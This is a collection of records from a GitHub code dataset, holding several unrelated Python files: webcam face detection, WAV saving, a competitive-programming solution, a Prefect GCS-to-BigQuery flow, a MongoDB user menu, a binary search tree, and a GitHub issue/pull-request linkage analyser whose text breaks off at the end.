+{"seq_id":"71403513187","text":"import cv2\nfrom threading import Thread \n\nclass PiWebcam(Thread):\n\tdef __init__(self, facemodel=\"haarcascade_frontalface_default.xml\"):\n\t\tThread.__init__(self)\n\t\tself._cam = cv2.VideoCapture(0)\n\t\tself._cam.set(3,100)\n\t\tself._cam.set(4,100)\n\t\tself._image = None\n\t\tself._ret = None\n\t\tself._stopCam = False\n\t\tself._cam_window = None\n\t\tself.face_c = cv2.CascadeClassifier(facemodel)\n\n\t\tself._facerec = None\n\n\t\t\n\tdef cam_window(self):\n\t\tif self._cam_window is None:\n\t\t\tself._cam_window = cv2.namedWindow(\"camera\", \n\t\t\t\t\t\t\t\t\t\t cv2.WINDOW_AUTOSIZE)\n\t\tif self._image is not None:\n\n\t\t\tif self._facerec is not None:\n\t\t\t\tfor (x,y,w,h) in self._facerec:\t\n\t\t\t\t\tcv2.rectangle(self._image,(x,y),(x+w,y+h),(244,0,0),2)\n\n\t\t\tcv2.imshow(\"camera\", self._image)\n\n\t\t#Tecla esc para sair\n\t\tif cv2.waitKey(1) == 27:\n\t\t\tcv2.destroyAllWindows()\n\t\t\tself.start_stop()\n\t\t\t\n\tdef face_detection(self):\n\t\tgray = self.get_gray()\t\t\n\t\tself._facerec = self.face_c.detectMultiScale(gray, 1.3,5)\n\n\tdef run(self):\n\t\twhile True:\t\t\n\t\t\tself.cam_window()\t\t\t\n\t\t\tself._ret, self._image = self._cam.read()\n\t\t\t\n\t\t\tif self._stopCam is True:\n\t\t\t\tbreak\n\t\t\t\t\n\tdef is_running(self):\n\t\treturn not self._stopCam\n\t\t\t\t\n\tdef start_stop(self):\n\t\tself._stopCam = True if self._stopCam is False else False\n\t\t\n\tdef get_image(self):\n\t\treturn self._image\n\t\t\n\tdef get_gray(self):\n\t\tif self._image is not None:\n\t\t\treturn cv2.cvtColor(self._image,cv2.COLOR_BGR2GRAY)\n\t\t\t\n\t\t\n\tdef set_image(self, image):\n\t\tself._image = image\n\n\nif __name__ == \"__main__\":\n\tmycam = PiWebcam()\n\tmycam.setDaemon(True)\n\tmycam.start()\n\n\twhile True:\n\t\timg = mycam.get_image()\n\t\tif img is not None:\n\t\t\tmycam.face_detection()\n\n\t\tif mycam.is_running() is False:\n\t\t\tbreak","repo_name":"duducosmos/piwebcam","sub_path":"piwebcam.py","file_name":"piwebcam.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"4449183786","text":"from scipy.io.wavfile import write\nfrom src.backend.audio_tracks.audio_track import AudioTrack\nfrom src.backend.audio_tracks.audio_constants import sample_rate\nimport numpy as np\n\nclass AudioSaver(object):\n def __init__(self):\n print(\"AudioSaver created!\")\n\n def save_wav_file(self, audio_track: AudioTrack, filename: str) -> bool:\n print(\"AudioSaver: save_wav_file\")\n # Intentar guardar el track de audio como .wav\n # Si salio bien, devolver True, sino, devolver False\n try:\n max = np.amax(np.abs(audio_track.content))\n #if max > (2**15)-1:\n if max != 0:\n audio_track.content = np.multiply(audio_track.content, ((2**15)-1)/max)\n write(filename, sample_rate, np.int16(audio_track.content))#.astype(np.int16))\n except:\n print(\"ERROR!!! AudioSaver coudn't save wav file!!!\")\n return False\n\n return True\n","repo_name":"AlexStephan/ASSD_TP2","sub_path":"src/backend/saver/audio_saver.py","file_name":"audio_saver.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43863139104","text":"# -*- coding: utf-8 -*-\n\n\ndef gcd(a,b):\n while b>0:\n a,b = b,a%b\n return a\n\ndef f(n,k,al):\n if k==1:\n return n*(n-1)//2\n\n kl = []\n r = 1\n while r*r<=k:\n if k%r==0:\n kl.append(r)\n kl.append(k//r)\n r += 1\n kl = list(set(kl))\n kl.sort()\n # print(kl)\n d = {}\n for a in al:\n x = gcd(a,k)\n if x not in d:\n d[x] = 0\n d[x] += 1\n # print(d)\n res = 0\n for i in range(len(kl)):\n for j in range(i,len(kl)):\n k1 = kl[i]\n k2 = kl[j]\n if gcd(k1*k2,k)!=k:\n continue\n if k1 in d and k2 in d:\n # print(k1,k2)\n if k1!=k2:\n res += d[k1]*d[k2]\n else:\n res += d[k1]*(d[k1]-1)//2\n\n return res\n\ndef f2(n,k,al):\n from itertools import combinations\n res = 0\n for p in combinations(al,2):\n if p[0]*p[1]%k==0:\n res += 1\n return res\n\nif __name__ == '__main__':\n n,k = map(int, input().split())\n al = list(map(int, input().split()))\n print(f(n,k,al))\n # print(\"f2\",f2(n,k,al))\n\n # from random import randint\n # n = 10\n #\n # for _ in range(100):\n # k = randint(1,100)\n # al = [randint(1,30) for _ in range(n)]\n #\n # a1 = f(n,k,al)\n # a2 = f2(n,k,al)\n # if a1!=a2:\n # print(a1,a2)\n # print(n,k,al)\n","repo_name":"takushi-m/atcoder-work","sub_path":"work/ddcc_2016_qual_c.py","file_name":"ddcc_2016_qual_c.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70845333346","text":"# Registers a flow that takes different gcs parquet files, and creates a single dataset, where each parquet file is a table.\n\nfrom prefect import Flow, unmapped, Parameter\nfrom prefect.run_configs import LocalRun\nfrom prefect.storage import GCS\nfrom prefect.executors import DaskExecutor\n\nfrom nl_open_data.config import config as CONFIG\nimport nl_open_data.tasks as nlt\n\nwith Flow(\"gcs_to_bq\") as gcs_to_bq_flow:\n \"\"\"A flow to create a BQ dataset from a list of GCS uris to parquet files.\n\n This flows takes in a list of GS uris, assumes that each uri points at a parquet file,\n and creates a new BQ dataset, where each uri is an external table in the dataset.\n \n uris : list[str]\n List of GS uris to parquet files\n dataset_name : str\n The dataset name to use when creating in BQ\n config : Config object\n Config object holding GCP and local paths.\n gcp_env : str\n Determines which GCP environment to use from config.gcp\n prod_env : str\n If gcp_env = \"prod\", determines which GCP environemnt to use from config.gcp.prod\n description : str\n The dataset description to use when creating in BQ\n \"\"\"\n uris = Parameter(\"uris\")\n dataset_name = Parameter(\"dataset_name\")\n config = Parameter(\"config\", default=CONFIG)\n gcp_env = Parameter(\"gcp_env\", default=\"dev\")\n prod_env = Parameter(\"prod_env\", default=None)\n description = Parameter(\"description\", default=\"\")\n\n nlt.create_linked_dataset(\n dataset_name=unmapped(dataset_name),\n gcs_uris=unmapped(uris),\n config=unmapped(config),\n gcp_env=unmapped(gcp_env),\n prod_env=unmapped(prod_env),\n description=unmapped(description),\n )\n\nif __name__ == \"__main__\":\n\n # Register flow\n gcs_to_bq_flow.storage = GCS(\n project=CONFIG.gcp.dev.project_id, bucket=f\"{CONFIG.gcp.dev.bucket}-prefect\",\n )\n gcs_to_bq_flow.run_config = LocalRun(labels=[\"nl-open-data-vm-1\"])\n gcs_to_bq_flow.executor = DaskExecutor()\n flow_id = gcs_to_bq_flow.register(\n project_name=\"nl_open_data\", version_group_id=\"gcs_to_bq\"\n )\n\n # # Run locally\n # URIS = [\n # \"gs://dataverbinders-dev/cbs/kwb/kwb_2013.parquet\",\n # \"gs://dataverbinders-dev/cbs/kwb/kerncijfers_wijken_en_buurten_2014.parquet\",\n # ]\n # DATASET_NAME = \"CBS_KWB_TEST\"\n # DATASET_DESCRIPTION = \"MY DESCRIPTION TEXT\"\n\n # params = {\n # \"uris\": URIS,\n # \"dataset_name\": DATASET_NAME,\n # \"description\": DATASET_DESCRIPTION,\n # }\n # state = gcs_to_bq_flow.run(parameters=params)\n","repo_name":"dataverbinders/nl-open-data","sub_path":"nl_open_data/flows/register/register_gcs_to_bq.py","file_name":"register_gcs_to_bq.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72836969827","text":"from pymongo import MongoClient\nfrom compras import create_compra, read_compras\nfrom config import URI\nfrom favoritos import menu_favoritos\n\nclient = MongoClient(URI)\ndb = client.mercado_livre\nmycol = db.usuario\n\n\ndef create_usuario():\n mycol = db.usuario\n print(\"\\nInserir novo usuário\")\n nome = input(\"Nome: \")\n sobrenome = input(\"Sobrenome: \")\n cpf = input(\"CPF: \")\n data_nascimento = input(\"Data de nascimento: \")\n key = 'S'\n end = []\n while (key != 'N'):\n rua = input(\"Rua: \")\n num = input(\"Número: \")\n bairro = input(\"Bairro: \")\n cidade = input(\"Cidade: \")\n estado = input(\"Estado: \")\n cep = input(\"CEP: \")\n endereco = {\n \"rua\": rua,\n \"num\": num,\n \"bairro\": bairro,\n \"cidade\": cidade,\n \"estado\": estado,\n \"cep\": cep\n }\n end.append(endereco)\n key = input(\"Deseja cadastrar um novo endereço (S/N)? \")\n mydoc = {\n \"nome\": nome, \n \"sobrenome\": sobrenome,\n \"data de nascimento\": data_nascimento, \n \"cpf\": cpf, \n \"endereco\": end\n }\n x = mycol.insert_one(mydoc)\n print(\"Usuário cadastrado com ID:\", x.inserted_id)\n\ndef read_usuario():\n cpf = input(\"Digite o CPF do usuário: \")\n\n user_query = {\"cpf\": cpf}\n mydoc = mycol.find(user_query)\n\n usuarios_encontrados = list(mydoc)\n\n if not usuarios_encontrados:\n print(\"Usuário não encontrado.\")\n else:\n for user in usuarios_encontrados:\n print(\"Dados do usuário: \", user)\n\ndef update_usuario(cpf):\n mycol = db.usuario\n myquery = {\"cpf\": cpf}\n mydoc = mycol.find_one(myquery)\n if mydoc:\n print(\"Dados do usuário:\")\n print(\"Nome:\", mydoc.get(\"nome\", \"\"))\n print(\"Sobrenome:\", mydoc.get(\"sobrenome\", \"\"))\n print(\"CPF:\", mydoc.get(\"cpf\", \"\"))\n print(\"Data de Nascimento:\", mydoc.get(\"data de nascimento\", \"\"))\n endereco = mydoc.get(\"endereco\", {})\n\n if isinstance(endereco, dict):\n print(\"Endereço:\")\n print(\" Rua:\", endereco.get(\"rua\", \"\"))\n print(\" Número:\", endereco.get(\"num\", \"\"))\n print(\" Bairro:\", endereco.get(\"bairro\", \"\"))\n print(\" Cidade:\", endereco.get(\"cidade\", \"\"))\n print(\" Estado:\", endereco.get(\"estado\", \"\"))\n print(\" CEP:\", endereco.get(\"cep\", \"\"))\n elif isinstance(endereco, list):\n print(\"Endereços:\")\n for addr in endereco:\n print(\" Rua:\", addr.get(\"rua\", \"\"))\n print(\" Número:\", addr.get(\"num\", \"\"))\n print(\" Bairro:\", addr.get(\"bairro\", \"\"))\n print(\" Cidade:\", addr.get(\"cidade\", \"\"))\n print(\" Estado:\", addr.get(\"estado\", \"\"))\n print(\" CEP:\", addr.get(\"cep\", \"\"))\n\n\n nome = input(\"Mudar nome: \")\n if len(nome):\n mydoc[\"nome\"] = nome\n\n sobrenome = input(\"Mudar sobrenome: \")\n if len(sobrenome):\n mydoc[\"sobrenome\"] = sobrenome\n\n data_nascimento = input(\"Mudar data de nascimento: \")\n if len(data_nascimento):\n mydoc[\"data de nascimento\"] = data_nascimento\n\n update_endereco = input(\"Atualizar endereço (S/N)? \").upper()\n if update_endereco == 'S':\n endereco = {}\n rua = input(\"Rua: \")\n num = input(\"Número: \")\n bairro = input(\"Bairro: \")\n cidade = input(\"Cidade: \")\n estado = input(\"Estado: \")\n cep = input(\"CEP: \")\n endereco = {\n \"rua\": rua,\n \"num\": num,\n \"bairro\": bairro,\n \"cidade\": cidade,\n \"estado\": estado,\n \"cep\": cep\n }\n mydoc[\"endereco\"] = endereco\n\n newvalues = {\"$set\": mydoc}\n mycol.update_one(myquery, newvalues)\n print(\"Usuário atualizado com sucesso\")\n else:\n print(\"Nenhum usuário encontrado para o CPF especificado\")\n\ndef delete_usuario(cpf):\n mycol = db.usuario\n myquery = {\"cpf\": cpf}\n mydoc = mycol.delete_one(myquery)\n if mydoc.deleted_count > 0:\n print(\"Usuário deletado com sucesso\")\n else:\n print(\"Nenhum usuário encontrado para o CPF especificado\")\n\ndef menu_usuario():\n while True:\n print(\"\\n\\033[1mMenu Usuário:\\033[0m\")\n print(\"1 - Criar Usuário\")\n print(\"2 - Ler Usuário\")\n print(\"3 - Atualizar Usuário\")\n print(\"4 - Deletar Usuário\")\n print(\"\\033[1mC - Menu Compras\\033[0m\")\n print(\"\\033[1mF - Menu Favoritos\\033[0m\")\n print(\"V - Voltar\")\n\n sub = input(\"Digite a opção desejada: \").upper()\n\n if sub == 'V':\n break\n\n if sub == '1':\n print(\"Criar Usuário\")\n create_usuario()\n\n elif sub == '2':\n read_usuario()\n\n elif sub == '3':\n nome = input(\"Atualizar usuário, qual o CPF? \")\n update_usuario(nome)\n\n elif sub == '4':\n print(\"Deletar Usuário\")\n cpf = input(\"CPF a ser deletado: \")\n delete_usuario(cpf)\n \n elif sub == 'C':\n while True:\n print(\"\\n\\033[1mMenu Compras:\\033[0m\")\n print(\"1 - Criar Compra\")\n print(\"2 - Ler Compras\")\n print(\"V - Voltar\")\n\n sub_compras = input(\"Digite a opção desejada: \").upper()\n\n if sub_compras == 'V':\n break\n\n if sub_compras == '1':\n cpf = input(\"Digite o CPF do usuário: \")\n create_compra(cpf)\n\n elif sub_compras == '2':\n cpf = input(\"Digite o CPF do usuário para listar as compras: \")\n read_compras(cpf)\n\n elif sub == 'F':\n cpf = input(\"Digite o CPF do usuário: \")\n menu_favoritos(cpf)\n\n \n","repo_name":"gabidsbarbosa/nosql","sub_path":"mongodb/usuario.py","file_name":"usuario.py","file_ext":"py","file_size_in_byte":6068,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"21465924880","text":"class TreeNode:\n def __init__(self, data, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\n\ndefaultNode = TreeNode(0)\nclass BST:\n def __init__(self, data):\n self.root = TreeNode(data)\n\n def contains(self, data, node=defaultNode):\n if (node == defaultNode):\n node = self.root\n if (node == None):\n return False\n if (node.data == data):\n return True\n if (data < node.data):\n return self.contains(data, node.left)\n else:\n return self.contains(data, node.right)\n\n def DFS(self, data, node=defaultNode):\n #check both left tree and right tree recursively then return true if either is true\n if (node == defaultNode):\n node = self.root\n\n if (node == None):\n return\n leftval = self.DFS(data, node.left)\n if (data == node.data):\n return True\n rightval = self.DFS(data, node.right)\n return leftval or rightval #need to do return the OR of this.\n\n def BFS(self, data):\n stack = [self.root]\n while (len(stack) > 0):\n node = stack.pop()\n if (node is None):\n continue\n if (node.data == data):\n return True\n stack.append(node.right)\n stack.append(node.left)\n return False\n\n\n def insert(self, data, node=defaultNode):\n if (node == defaultNode):\n node = self.root\n if (node == None):\n return TreeNode(data)\n if (data < node.data):\n node.left = self.insert(data, node.left)\n elif (data > node.data):\n node.right = self.insert(data, node.right)\n else:\n pass # do nothing on duplicate keys\n return node\n\n def inorder(self, node):\n if node is None:\n return\n self.inorder(node.left) #see how we do the operation THEN print.\n print(node.data, end=' ')\n self.inorder(node.right)\n\n def postorder(self, node):\n if node is None:\n return\n self.postorder(node.left)\n self.postorder(node.right)\n print(node.data, end=' ')\n\n def preorder(self, node):\n if node is None:\n return\n print(node.data, end=' ')\n self.preorder(node.left)\n self.preorder(node.right)\n\n\nif __name__ == \"__main__\":\n test = BST(4)\n test.insert(2)\n test.insert(1)\n test.insert(3)\n test.insert(6)\n test.insert(5)\n test.insert(7)\n test.inorder(test.root)\n print()\n print(test.contains(4))\n print(test.contains(1))\n print(test.contains(-1))\n test.preorder(test.root)\n print()\n test.postorder(test.root)\n print()\n test.inorder(test.root)\n print()\n print(test.DFS(1))\n print(test.DFS(-1))\n print(test.DFS(7))\n print(test.BFS(1))\n print(test.BFS(-1))\n print(test.BFS(7))\n","repo_name":"lundbird/LeetCode","sub_path":"data_structures/BST.py","file_name":"BST.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"27898363171","text":"import csv\nimport re\nfrom time import *\nfrom os import path\nfrom datetime import date\n\ndef write_execution_time_log(github_repo, method_name, execution_time):\n workspace = github_repo.split(\"/\")[1] + '/statistics/'\n if path.exists(workspace + 'execution_time_log.csv'):\n timeLogCsvFile = open(workspace + 'execution_time_log.csv','a')\n else:\n timeLogCsvFile = open(workspace + 'execution_time_log.csv','w+')\n timeLogCsvFile.write('method_name,date,execution_time')\n timeLogCsvFile.write('\\n' + method_name +','+ date.today().strftime(\"%d/%m/%Y\") +','+ str(execution_time))\n timeLogCsvFile.close()\n\ndef del_duplicates(l):\n return list(dict.fromkeys(l))\n\ndef csv_to_json_list(csv_path):\n with open(csv_path, \"r\") as csvfile:\n lines = csvfile.read().splitlines()\n keys = lines[0].split(\",\")\n keys_length = len(keys)\n cvs_list = []\n for line in lines[1:]:\n temp_json = {}\n row = line.split(\",\", keys_length)\n if not (len(row) < keys_length):\n for index in range(keys_length):\n temp_json[keys[index]] = row[index]\n cvs_list.append(temp_json)\n return cvs_list\n \ndef generate_json_from_csv(key_attribute, csv_path):\n \"\"\"\n This function returns a JSON structure like\n {\n {key_1: { atr1: [data_1, data_2, ... , data_n], atr_2: [data_1, data_2, ... , data_n], ... , atr_n: [data_1, data_2, ... , data_n]}},\n {key_2: { atr1: [data_1, data_2, ... , data_n], atr_2: [data_1, data_2, ... , data_n], ... , atr_n: [data_1, data_2, ... , data_n]}},\n ... ,\n {key_n: { atr1: [data_1, data_2, ... , data_n], atr_2: [data_1, data_2, ... , data_n], ... , atr_n: [data_1, data_2, ... , data_n]}},\n }\n \"\"\"\n json = {}\n with open(csv_path, \"r\") as csvfile:\n lines = csvfile.read().splitlines()\n keys = lines[0].split(\",\")\n keys_length = len(keys)\n key_id_index = keys.index(key_attribute)\n keys.remove(key_attribute)\n for line in lines[1:]:\n row = line.split(\",\", keys_length)\n if not (len(row) < keys_length):\n key = row[key_id_index]\n row.remove(key)\n if not key in json:\n json[key] = {}\n for column in range(0, keys_length - 1):\n json[key][keys[column]] = [row[column]]\n else:\n for column in range(0, keys_length - 1):\n json[key][keys[column]].append(row[column])\n return json\n\ndef analyze_issues_and_pulls(github_repo):\n start_time = time()\n workspace = github_repo.split(\"/\")[1] + '/files/'\n log_file = open(\"log.file\",\"w\")\n \"\"\"\n # Generating organized JSON data from issues related csv files\n \"\"\"\n issues_json = generate_json_from_csv(\"issue_no\", workspace + \"issues.csv\")\n issues_json.update(generate_json_from_csv(\"issue_no\", workspace + \"issues_comments.csv\"))\n \"\"\"\n # Generating organized JSON data from pull requests related csv files\n \"\"\"\n pulls_json = generate_json_from_csv(\"pull_no\", workspace + \"pulls.csv\")\n pulls_json.update(generate_json_from_csv(\"pull_no\", workspace + \"pulls_comments.csv\"))\n \"\"\"\n # Analysing issue data JSON\n \"\"\"\n rows = [['issue_no','found_id','is_issue','is_pull_request']]\n statistics = {\"issue numbers\":0,\"pull request numbers\":0,\"both\":0,\"unknown\":0}\n issue_progress_counter = 0\n\n for (issue_no, attributes) in issues_json.items():\n for attr in [\"title\",\"body\",\"comment_body\"]:\n if attr in attributes:\n for attribute in attributes[attr]:\n links = re.findall(r\"([C|c]lose[s|d]?|[R|r]esolve[s|d]?|[F|f]ix|[F|f]ixe[s|d])?\\s+([\\w|\\-|/]*)?#(\\d+)\", attribute)\n log_file.seek(0)\n log_file.write(\"Current Method: analyze_issues_and_pulls\\n Task progress: \" + str((issue_progress_counter * 100)/len(issues_json)) + \"\\n\")\n log_file.truncate()\n #print(\" Analyzing issues data. Progress \", (issue_progress_counter * 100)/len(issues_json), \" \", end=\"\\r\")\n for link in links:\n is_issue = link[2] in issues_json\n is_pull_request = link[2] in pulls_json\n if is_issue: statistics[\"issue numbers\"] += 1 \n if is_pull_request: statistics[\"pull request numbers\"] += 1 \n if is_issue and is_pull_request: statistics[\"both\"] += 1 \n if not is_issue and not is_pull_request: statistics[\"unknown\"] += 1 \n rows.append([issue_no, link[2], is_issue, is_pull_request])\n issue_progress_counter += 1\n \"\"\"\n # Printing statistics\n \"\"\"\n print(\"\\n\",\"-\"*30)\n print(\"Statistics for issue data analysis\")\n print(\"-\"*30)\n print(\"Total links found:\",len(rows))\n for (text, value) in statistics.items():\n print(\"Links that are\",text,\":\",value)\n print(\"-\"*30,\"\\n\\n\")\n \"\"\"\n # Creating cvs file\n \"\"\"\n outCsvFile = open(workspace + 'issues_analysis.csv', 'w')\n csv_writer = csv.writer(outCsvFile)\n csv_writer.writerows(rows)\n outCsvFile.close()\n \"\"\"\n # Analysing pull request data JSON\n \"\"\"\n rows = [['pull_no','found_id','is_issue','is_pull_request']]\n statistics = {\"issue numbers\":0,\"pull request numbers\":0,\"both\":0,\"unknown\":0}\n pull_progress_counter = 0\n\n for (pull_no, attributes) in pulls_json.items():\n for attr in [\"title\",\"body\",\"comment_body\"]:\n if attr in attributes:\n for attribute in attributes[attr]:\n links = re.findall(r\"([C|c]lose[s|d]?|[R|r]esolve[s|d]?|[F|f]ix|[F|f]ixe[s|d])?\\s+([\\w|\\-|/]*)?#(\\d+)\", attribute)\n log_file.seek(0)\n log_file.write(\"Current Method: analyze_issues_and_pulls\\n Task progress: \" + str((pull_progress_counter * 100)/len(pulls_json)) + \"\\n\")\n log_file.truncate()\n #print(\" Analyzing pull requests data. Progress \", (pull_progress_counter * 100)/len(pulls_json), \" \", end=\"\\r\")\n for link in links:\n is_issue = link[2] in issues_json\n is_pull_request = link[2] in pulls_json\n if is_issue: statistics[\"issue numbers\"] += 1 \n if is_pull_request: statistics[\"pull request numbers\"] += 1 \n if is_issue and is_pull_request: statistics[\"both\"] += 1 \n if not is_issue and not is_pull_request: statistics[\"unknown\"] += 1 \n rows.append([pull_no, link[2], is_issue, is_pull_request])\n pull_progress_counter += 1\n \"\"\"\n # Printing statistics\n \"\"\"\n print(\"\\n\",\"-\"*30)\n print(\"Statistics for pull request data analysis\")\n print(\"-\"*30)\n print(\"Total links found:\",len(rows))\n for (text, value) in statistics.items():\n print(\"Links that are\",text,\":\",value)\n print(\"-\"*30)\n \"\"\"\n # Creating cvs file\n \"\"\"\n outCsvFile = open(workspace + 'pull_request_analysis.csv', 'w')\n csv_writer = csv.writer(outCsvFile)\n csv_writer.writerows(rows)\n outCsvFile.close()\n log_file.close()\n\n write_execution_time_log(github_repo, \"analyze_issues_and_pulls\", time() - start_time)\n\ndef analyze_linking_events(github_repo):\n start_time = time()\n workspace = github_repo.split(\"/\")[1] + '/files/'\n issues_events_list = csv_to_json_list(workspace + 'issues_events.csv')\n pulls_events_list = csv_to_json_list(workspace + 'pulls_events.csv')\n\n filtered_issues_events_list = []\n filtered_pulls_events_list = []\n\n for issue_event in issues_events_list:\n if issue_event['event'] in ['connected','disconnected']:\n filtered_issues_events_list.append(issue_event)\n\n for pull_event in pulls_events_list:\n if pull_event['event'] in ['connected','disconnected']:\n filtered_pulls_events_list.append(pull_event) \n\n linked_issues_and_pull_events = [['issue_no', 'pull_no', 'actor', 'created_at', 'event']]\n\n for issue_event in filtered_issues_events_list:\n for pull_event in filtered_pulls_events_list:\n\n issue_relevant_data = [issue_event['actor'], issue_event['created_at'], issue_event['event']]\n pull_relevant_data = [pull_event['actor'], pull_event['created_at'], pull_event['event']]\n\n if issue_relevant_data == pull_relevant_data:\n linked_issues_and_pull_events.append([issue_event['issue_no'], pull_event['pull_no']] + issue_relevant_data) \n \n analyzedEventsCsvFile = open(workspace + 'linking_analysis.csv', 'w')\n\n issues_events_csv_writer = csv.writer(analyzedEventsCsvFile)\n issues_events_csv_writer.writerows(linked_issues_and_pull_events)\n \n analyzedEventsCsvFile.close()\n\n write_execution_time_log(github_repo, \"analyze_linking_events\", time() - start_time)\n\ndef link_commits_pulls_and_issues(github_repo):\n start_time = time()\n workspace = github_repo.split(\"/\")[1] + '/files/'\n outCsvFile = open(workspace + 'linked_commits_pulls_and_issues.csv', 'w')\n log_file = open(\"log.file\",\"w\")\n\n csv_writer = csv.writer(outCsvFile)\n\n commits_pulls = generate_json_from_csv(\"commit_sha\", workspace + \"commits_pulls.csv\")\n linked_pull_issues = generate_json_from_csv(\"pull_no\", workspace + \"pull_request_analysis.csv\")\n pulls_without_commits = generate_json_from_csv(\"total_commits\", workspace + \"pulls_commits_total.csv\")\n manual_linked_pull_issues = csv_to_json_list(workspace + \"linking_analysis.csv\")\n\n rows = [['commit_sha', 'pull_no', 'issue_no']]\n # ---------------------------------------------------------------\n # This code deletes disconnected events from linking_analysis.csv \n # ---------------------------------------------------------------\n index = 0\n while index < len(manual_linked_pull_issues):\n current_element = manual_linked_pull_issues[index]\n if current_element['event'] == 'disconnected':\n delete_index = 0\n element = manual_linked_pull_issues[delete_index]\n while delete_index < len(manual_linked_pull_issues) and element['issue_no'] != current_element['issue_no'] and element['pull_no'] != current_element['issue_no'] and element['event'] != 'connected':\n delete_index += 1\n element = manual_linked_pull_issues[delete_index]\n del manual_linked_pull_issues[index]\n del manual_linked_pull_issues[delete_index]\n index += 1\n # ---------------------------------------------------------------\n c = 0\n for (commit_sha, attributes) in commits_pulls.items():\n if len(attributes['pull_no']) == 0:\n # If there is not pulls for this commit\n rows.append([commit_sha, 'None', 'None'])\n else:\n # If there are ...\n for pull_no in attributes['pull_no']:\n # Saving all posible boolean scenarios for a pull-issue linking event\n there_are_issues = pull_no in linked_pull_issues\n there_are_manual_issues = pull_no in manual_linked_pull_issues\n there_are_not_issues = (not there_are_issues) and (not there_are_manual_issues)\n # Taking action according boolean scenario\n if there_are_issues:\n found_id = linked_pull_issues[pull_no]['found_id']\n is_issue = linked_pull_issues[pull_no]['is_issue']\n for i in range(len(is_issue)):\n if is_issue[i] == 'True':\n rows.append([commit_sha, pull_no, found_id[i]])\n if there_are_manual_issues:\n for link in manual_linked_pull_issues:\n if pull_no == link['pull_no']:\n rows.append([commit_sha, pull_no, link['issue_no']])\n if there_are_not_issues:\n rows.append([commit_sha, pull_no, 'None'])\n progress = (c * 100) / len(commits_pulls)\n log_file.seek(0)\n log_file.write(\"Current Method: link_commits_pulls_and_issues\\n Task progress: \" + str(progress) + \"\\n\")\n log_file.truncate()\n #print(\" \", progress, \"% \", end=\"\\r\")\n c += 1\n # ---------------------------------------------------------------\n # This codes link all pulls without commits with issues\n # ---------------------------------------------------------------\n if '0' in pulls_without_commits:\n for pull in pulls_without_commits['0']['pull_no']:\n # Saving all posible boolean scenarios for a pull-issue linking event\n there_are_issues = pull in linked_pull_issues\n there_are_manual_issues = pull in manual_linked_pull_issues\n there_are_not_issues = not there_are_issues and not there_are_manual_issues\n # Taking action according boolean scenario\n if there_are_issues:\n found_id = linked_pull_issues[pull]['found_id']\n is_issue = linked_pull_issues[pull]['is_issue']\n for i in range(len(is_issue)):\n if is_issue[i] == 'True':\n rows.append(['None', pull, found_id[i]])\n if there_are_manual_issues:\n for link in manual_linked_pull_issues:\n if pull == link['pull_no']:\n rows.append(['None', pull, link['issue_no']])\n if there_are_not_issues:\n rows.append(['None', pull, 'None'])\n # ---------------------------------------------------------------\n csv_writer.writerows(rows)\n\n outCsvFile.close()\n log_file.close()\n\n write_execution_time_log(github_repo, \"link_commits_pulls_and_issues\", time() - start_time)\n\ndef group_pulls_and_commits(github_repo):\n \"\"\"\n This function returns a JSON structure like\n {\n { group_1: { pulls: [data_1, data_2, ... , data_n], commits: [data_1, data_2, ... , data_n] } },\n { group_2: { pulls: [data_1, data_2, ... , data_n], commits: [data_1, data_2, ... , data_n] } },\n ... ,\n { group_n: { pulls: [data_1, data_2, ... , data_n], commits: [data_1, data_2, ... , data_n] } },\n }\n \"\"\"\n workspace = github_repo.split(\"/\")[1] + '/files/'\n linked_elements = csv_to_json_list(workspace + \"linked_commits_pulls_and_issues.csv\")[::-1]\n log_file = open(\"log.file\",\"w\")\n groups = {}\n group_counter = 0\n progress_counter = 0\n\n for element in linked_elements:\n found = False\n if element['pull_no'] != 'None' and element['commit_sha'] != 'None':\n for (group, attributes) in groups.items():\n if element['pull_no'] in attributes['pulls']:\n groups[group]['commits'].append(element['commit_sha'])\n found = True\n break\n if element['commit_sha'] in attributes['commits']:\n groups[group]['pulls'].append(element['pull_no'])\n found = True\n break\n if not found:\n groups[group_counter] = {}\n groups[group_counter]['commits'] = [element['commit_sha']]\n groups[group_counter]['pulls'] = [element['pull_no']]\n group_counter += 1\n progress = (progress_counter * 100) / len(linked_elements)\n log_file.seek(0)\n log_file.write(\"Current Method: get_pulls_commits_groups\\n Task progress: \" + str(progress) + \"\\n\")\n log_file.truncate()\n #print(\" \", progress, \"% \", end=\"\\r\")\n progress_counter += 1\n log_file.close()\n return groups\n\ndef get_pulls_commits_groups(github_repo):\n start_time = time()\n workspace = github_repo.split(\"/\")[1] + '/files/'\n groupsTotalCsvFile = open(workspace + 'pulls_commits_groups_total.csv', 'w')\n groupsCsvFile = open(workspace + 'pulls_commits_groups.csv', 'w')\n groups_total_csv_writer = csv.writer(groupsTotalCsvFile)\n groups_csv_writer = csv.writer(groupsCsvFile)\n\n groups_total_rows = [['group','oldest_pull','pulls_total','commits_total']]\n groups_rows = [['group','elements']]\n\n groups = group_pulls_and_commits(github_repo)\n\n for (group, attributes) in groups.items():\n # Turn into integers all elements in attributes['pulls']\n int_pulls = [int(e) for e in attributes['pulls']]\n groups_total_rows.append([group, min(int_pulls), len(attributes['pulls']), len(attributes['commits'])])\n groups_rows.append([group] + attributes['pulls'] + attributes['commits'])\n\n groups_total_csv_writer.writerows(groups_total_rows)\n groups_csv_writer.writerows(groups_rows)\n\n groupsTotalCsvFile.close()\n groupsCsvFile.close()\n\n write_execution_time_log(github_repo, \"get_pulls_commits_groups\", time() - 